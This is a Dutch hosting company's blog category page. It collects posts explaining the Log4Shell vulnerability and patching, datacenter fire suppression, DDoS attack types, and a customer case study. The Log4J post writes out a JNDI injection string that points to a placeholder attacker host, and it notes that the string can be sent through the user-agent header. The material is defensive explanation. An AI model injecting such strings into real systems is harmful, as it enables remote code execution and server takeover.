Browse Category: datacenter

Log4J – grootschalige zero-day exploit zet het Internet op zijn kop

Het internet staat de laatste dagen in brand. Afgelopen week werd een exploit ontdekt in Apache’s Log4J, een opensource log library dat veel wordt verwerkt in allerhande toepassingen gebasseerd op Java. De officiële naam voor deze bug in de Common Vulnerabilities and Exposures database (afgekort CVE) is CVE-2021-44228. Doordat deze exploit zo eenvoudig uit te buiten is, is menig systeembeheerder nerveus.

Wat is Log4J nu juist?

Log4J is dus een opensource library geschreven in het populaire Java. Log4J stelt applicaties in staat om op een zeer eenvoudige manier acties die gebeuren in de applicaties te gaan loggen. Een eenvoudig voorbeeld zou kunnen zijn wanneer een gebruiker zich aanmeldt op een webapplicatie met zijn gebruikersnaam/wachtwoord, we hiervan een melding opnemen in logbestanden.

De Log4J module zal je als systeembeheerder echter niet rechtstreeks terugvinden in de lijst met geïnstalleerde applicaties. Log4J is een module die vaak mee ingebakken zit in een 3rd party applicatie om daar logging te verzorgen. Laat net dit een groot probleem vormen bij deze exploit: je weet als systeembeheerder potentieel niet of Log4J aanwezig is in jouw omgeving. Wil je weten of een applicatie gebruik maakt van Log4J, dan zal je navraag moeten doen bij je software leverancier.

Op Github circuleren ondertussen gigantische lijsten van vendors en producten die geïmpacteerd zijn door deze exploit en hoe dit mogelijks op te lossen is.

Hoe kan Log4J misbruikt worden?

Wat er exact ontdekt is, is dat een bepaalde attackstring als userinput kan meegegeven worden aan een applicatie. De userinput kan eenvoudig gemanipuleerd worden door een malafide URL toe te voegen met daarachter een payload. Deze input zal door Log4J opgenomen worden en vervolgens zal de payload worden uitgevoerd.

De aanvaller kan op deze manier een zogenaamde remote shell krijgen op de server. Vandaar ook dat men deze exploit log4shell noemt.

Voorbeeld:

  • Een aanvaller vult bijvoorbeeld een formulier in met malafide content zoals bijvoorbeeld ${jndi:ldap://www.attacker.com/a}.
  • De applicatie gaat deze input loggen via Log4J, door de exploit gaat Log4J de url attacker.com volgen en uitvoeren.
  • Er heeft zich een Remote Code Execution voorgedaan en de malafide content is gedownload op de server én uitgevoerd. De aanvaller heeft nu potentieel toegang tot de server.

Maar het kan nog eenvoudiger. Wanneer een aanvaller de HTTP Useragent wijzigt van een gebruiker naar zo’n malafide url, dan zal zich een identiek proces voordoen en eentje dat zeer eenvoudig te automatiseren is. Dat is wat we nu ook op grote schaal zien: servers worden extern getest om te zien of ze kwetsbaar zijn voor deze exploit en zullen mogelijks op later tijdstip aangevallen worden.

Description of the CVE-2021-44228 vulnerability

Description of the CVE-2021-44228 vulnerability

Wat moet je ondernemen?

We hebben in het verleden al meermaals exploits gezien, maar deze beperkte zich telkens tot een afgelijnde set toepassingen of applicaties. Wat de Log4J exploit uniek maakt is dat het een exploit betreft in een library die ingesloten is in zeer veel andere producten of diensten.

Minecraft was een van de eerste applicaties die getroffen was door Log4J waar men er op een ludieke manier misbruik van maakte. Maar het zal niet bij deze ludieke acties blijven. We zien dat Log4J momenteel vooral uitgebuit wordt om cryptominers te installeren op geïnfecteerde machines om zo cryptomunten te delven. Het is zeker niet uitgesloten dat log4J in de toekomst zal gebruikt worden voor het lanceren van ransomware aanvallen.

Het is vooral belangrijk om jouw systemen zo snel als mogelijk te updaten! Software leveranciers zullen de nodige updates moeten uitbrengen om een recente veilige versie van Log4J te installeren binnen hun pakket. Als ze die niet direct kunnen uitbrengen zijn vaak work-arounds beschikbaar om tijdelijk Log4J uit te schakelen om zo het gevaar te elimineren.

Daarnaast is het ook belangrijk om de evoluties aangaande deze exploit op de voet te volgen.  Zo was er recent een melding dat er opnieuw een kwetsbaarheid gevonden was in de patch die de problemen zou moeten verhelpen. (Beveiligingsonderzoekers melden opnieuw kwetsbaarheid in log4j-library – IT Pro – Nieuws – Tweakers)

Ben je niet zeker of Log4J aanwezig is in je onderneming of netwerk is het aangeraden om contact op te nemen met de leverancier van de software pakketten en daar navraag te doen.

Wat heeft Xenius al ondernomen ?

Xenius heeft ondertussen de nodige update gelanceerd op alle managed servers. Beschik je over een unmanaged server, dan raden we je aan om zo snel als mogelijk de nodige updates door te voeren.

Hulp of ondersteuning nodig?

Onze support staat klaar om je te helpen. Contacteer ons via support@xenius.be.

Rakedi: geïntegreerde IT-oplossing voor digitaal bestelplatform

Wie is Rakedi?

Rakedi ontwikkelt gepersonaliseerde websites met een geïntegreerd bestelplatform voor verschillende soorten restaurants. Mensen kopen immers steeds vaker hun producten en maaltijden online. Rakedi speelt in op deze trend met gebruiksvriendelijke webshops en bestelmodules. Zo kunnen hun klanten zelf eenvoudig hun website aanpassingen.

Daarnaast verkoopt Rakedi schermen om ter plaatse snel en eenvoudig een bestelling te plaatsen, bijvoorbeeld op events waar een vertegenwoordiger toelichting wil geven aan een potentiële koper met een hapje of een drankje.

Tot slot ontwikkelt Rakedi extra modules voor hun platformen. Zo kunnen ze bijvoorbeeld kassasystemen en marketingmodules hieraan koppelen. Rakedi biedt zelfs de Rakedi Coin aan, een module die de traditionele klantenkaart vaarwel zegt.

Rakedi heeft al een uitgebreide klantenportefeuille met grote namen, zoals Bicky en Leonidas.

Leonidas (chocolate maker) - Wikipedia

Leonidas (chocolate maker) - Wikipedia Bicky Burger - Bicky

Wat was de uitdaging?

Veiligheid, snelheid en efficiëntie zijn cruciaal voor een goede gebruikerservaring van hun platformen. Daarom heeft Rakedi nood aan een betrouwbare IT-partner waarmee zij snel kunnen schakelen. Samen zochten we naar naar de best mogelijke oplossing voor het hosten van de geschikte servers, het onderhoud, de 24/7 support en het uitvoeren van de nodige upgrades, updates en customisations.

Hoe hebben we dit opgelost?

Rakedi ziet de toekomst van digitale bestelplatformen erg rooskleurig. Daarom ontwikkelden we een toekomstgerichte omgeving, geschikt om zowel applicaties als infrastructuren op te schalen. We voorzien een performante infrastructuur doordat we werken met meerdere web- en database servers.

Naast het opzetten van deze infrastructuur op maat, zijn we ook verantwoordelijk voor het dagelijks beheer van de servers. Onze Xenius cloud servers vormen de basis voor het Rakedi platform. De impact van serverproblemen limiteren we met onze slimme schalingtechnieken. Als er toch een issue opduikt brengt ons monitoring platform ons op de hoogte. Zo blijven de platformen 24/7 bereikbaar en kunnen we snel ingrijpen waar nodig.

Ten slotte werken we nauw samen met de ontwikkelaars van het Rakedi-platform om de prestaties te maximaliseren. Een vlotte communicatie en aangename samenwerking vormen bij ons dan ook steeds de basis voor een goede klantrelatie. Ben jij ook op zoek naar een betrouwbare IT partner die met je meedenkt? Contacteer ons voor advies op maat van jouw project.

Hoe werkt brandbestrijding in een datacenter?

Afgelopen week werd OVH – één van de grootste Europese cloudspelers – getroffen door een brand op hun site in Straatsburg (FR). Eén datacenter werd volledig verwoest door de brand, een ander gedeeltelijk en 2 andere aanpalende datacenters van de groep werden onbereikbaar.  Meteen na de brand riep het bedrijf iedereen op om hun Disaster Recovery Plan (DRP) te activeren.

Gelukkig komen branden als deze – waarbij volledige datacenter gebouwen vernield worden – zeer zelden voor. Dit heeft alles te maken met de manier waarop we branden detecteren én bestrijden binnen een datacenter.
Wanneer een datacenter met een brand te maken heeft wil het deze in een zo vroeg mogelijk stadium detecteren en er dan gepast op reageren.

De detectie van brandhaarden

Om beginnende brandhaarden te detecteren maakt men gebruik van een VESDA detectie systeem. VESDA is de afkorting voor Very Early Smoke Detection Aspiration. Zoals de naam al zegt is dit systeem in staat om in een zeer vroeg stadium rook ontwikkeling te ontdekken. Het systeem doet dit door continu lucht uit de datavloer te analyseren via een uitgebreid netwerk van buizen binnen de datavloer.
Eenmaal de lucht is aangekomen in het VESDA systeem gebeurt de detectie voornamelijk op basis van laser technologie. Deze technologie laat toe om de minste vervuiling in de lucht te detecteren en zeer snel alarm te slaan indien het om rook/roet partikels gaat.

Vesda branddetectie

Dit VESDA systeem vult men aan met traditionele rookmelders.
Door gebruik te maken van 2 verschillende systemen / technologieën voorkomt men valse detecties door bijvoorbeeld 1 systeem. (of het falen ervan)

Blussing van de (beginnende) brand

Wanneer meerdere alarmen afkomstig van de branddetectiesysten komen is het tijd voor actie, onmiddellijke actie. De branddetectie systemen sturen in eerste instantie de nodige alarmen aan zodat iedereen die zich nog op de datavloer begeeft de ruimte zo snel mogelijk kan verlaten.

Na een zeer korte periode activeert de brandmeldingscentrale de volautomatische gasblussing. Een blussing met water is niet wenselijk op de datavloer omdat dat schade zou aanrichten aan de apparatuur.
Bij een gasblussing blaast men onder hoge druk een mengsel van argon en stikstof de ruimte in. Deze combinatie zorgt ervoor dat de zuurstof concentratie op de datavloer drastisch zakt waardoor de brandhaard in de kiem gesmoord kan worden.
Dit gas is niet schadelijk voor mens, dier en hardware.Hoewel het gas niet dodelijk is is een verblijf op de datavloer tijdens een blussing niet aangeraden 🙂

De ingeblazen argon is opgeslagen in het datacenter in meerdere gascilinders:

De Xenius datacenters

Bij Xenius maken we enkel gebruik van professionele datacenters. Zowel in Gent (GTT) als in Zaventem (InterXion) beschikt men over voldoende middelen (zoals oa. hierboven beschreven) om een beginnende brand in de kiem te smoren.

Wat is een DDoS attack?

De afgelopen dagen komen er opnieuw veel meldingen in de media van verschillende ISPs en hosting providers waarbij hun services onbereikbaar of slechts partieel functioneren. Oorzaak? Een DDoS aanval.

DDoS is de afkorting voor Distributed Denial of Services. Bedoeling van dit type aanval is een specieke website of volledig netwerk volledig onbereikbaar en onbruikbaar te maken. In het verleden was Xenius ook reeds slachtoffer van dit type aanval.

DDoS aanvallen kunnen vaak anoniem gekocht worden voor slechts een paar dollars of crypto valuta. DDoS aanvallen gebeuren vaak door zogenoemde webstressers, platformen die bedoeld zijn voor het testen van je website onder hoge load of piekbelasting. Echter kennen die platformen ook een 2de gebruik.

DDoS for Hire | Booter, Stresser and DDoSer | Imperva

Hoe werkt een Denial of Service (DoS)

Neem nu een Apache webserver, de primaire taak van dit type server is binnenkomende verbindingen accepteren en vervolgens laten afhandelen door Apache met als resultaat een website. Elke binnenkomende connectie verbruikt server en netwerk resources: bandbreedte, cpu en geheugen. Wanneer een DoS aanval plaatsvindt zal de aanvaller zoveel verbindingen/connecties openen naar de server totdat deze op een bepaald moment volledig verzadigd geraakt en geen binnenkomende connecties meer kan aanvaarden (geen cpu, memory of bandbreedte meer heeft). Resultaat: de server is onbereikbaar en de website offline. Doel bereikt!

Een manier om DoS aanvallen te onderscheiden van legitiem verkeer en te blokkeren is op basis van het source IP adres van de verbinding. Wanneer we zien dat er veel meer dan normaal connecties toekomen van een bepaald ip adres kunnen we dit ip adres eenvoudig blokkeren. Uiteraard zijn aanvallers ook op de hoogte van deze vrijwel eenvoudige manier van DoS aanvallen te stoppen. Het is hier dat Distributed Denial of Service (DDoS) op de proppen komt, een geavanceerdere manier van DoS die veel moeilijker te stoppen is.

Een DDoS aanval is in cé identiek aan een DoS aanval, grote verschil is het woordje distributed bij dit type aanval. Een aanvaller gaat hierbij gebruik maken van een botnet om zijn aanval uit te voeren. Zo’n botnet bestaat typisch uit een wereldwijd verspreid netwerk van computers, servers en andere netwerk/IoT devices (zoals camera’s, koelkasten,..) die geïnfecteerd zijn met malware en – zonder dat de eigenaar het vaak weet – ingezet worden voor het uitvoeren van DoS aanvallen.
Het grote probleem hierbij is dat de DoS aanvallen op deze manier van verschillende source ips toekomen en het dus niet zo eenvoudig is om deze te blokkeren.

Types DDoS attacks

We onderscheiden verschillende vormen van aanvallen, waarvan we er hieronder een 2-tal beschrijven.

Amplification attack

Een van de bekendere vormen van aanvallen zijn de zogenaamde amplification attacks. Bij dit type aanval valt de aanvaller zijn doelwit niet rechstreeks aan maar doet dit met via een tussenstation om op die manier zijn aanval te versterken. Bij een typische netwerk aanvraag stuur je een minimale hoeveelheid data naar de server en antwoord de server vervolgens met veel meer data (de content) terug. Wanneer men een amplification attack  gaat uitvoeren stuurt de aanvaller een aanvraag naar een server (bijvoorbeeld een open NTP of DNS server) waarbij ze het bron adres spoofen en wijzigen in dat van het aan te vallen doelwit. Op die manier stuurt het botnet onrechtstreeks massa’s data naar het target.

SYN Flood attack

Regulier TCP verkeer verloopt steeds volgens een 3-way handshake principe: SYN/SYN-ACK/ACK.  Bij een SYN flood attack maakt men misbruik van dit principe en stuurt men een TCP pakket met een aangepast bron adres naar het target. Het target stuurt vervolgens een SYN-ACK pakket terug naar het bron adres en houdt in tussentijd de connectie open (wachtende op een ACK signaal dat nooit zal komen). De aanvaller stuurt zoveel malafide pakketjes dat het target op een bepaald moment zoveel connecties heeft openstaan (die het niet kan afsluiten) dat de server onbereikbaar zal worden.

Dit zijn slechts 2 van de vele vormen van DDoS aanvalen die kunnen plaatsvinden.

Werking van TCP 3-way handshake
Werking van een normale 3-Way handshape in het TCP protocol

Oneerlijke strijd

Wanneer een server of volledig netwerk een DDoS aanval te verwerken krijgt is het vaak onduidelijk wie er achter de aanval zit. Is het een concurrent, of een kiddie die een statement wil maken en zijn skills wil uittesten? Twee dingen staan vast: DDoS aanvallen richten ontzettend veel schade aan (operationieel én financieel) en als hostingprovider voeren we een oneerlijke strijd tegen dit type aanvallen. Eenieder kan voor zeer weinig geld een DDoS aanval startten, echter het detecteren, blokkeren en stoppen van de aanval is een complex en technisch iets wat als hostinprovider bakken geld kost.
Deze kost staat in schril contrast met de prijzenoorlog en bodem prijzen die worden gehanteerd voor webhosting en cloudservers.

Hosting bij Level27

Bij Level27 worden betrouwbare, veilige en stabiele hostingdiensten op maat geleverd. Ze inspireren organisaties om betere applicaties en website te bouwen om er performante resulaten mee te bereiken.

100% onafhankelijk, blijven innoveren, proactief advies en rechtstreekse communicatie zijn de idealen waar Level27 voor staat.

Op de site geen prijzen, alleen gepersonaliseerde voorstellen op maat.

https://level27.be/

Comments

comments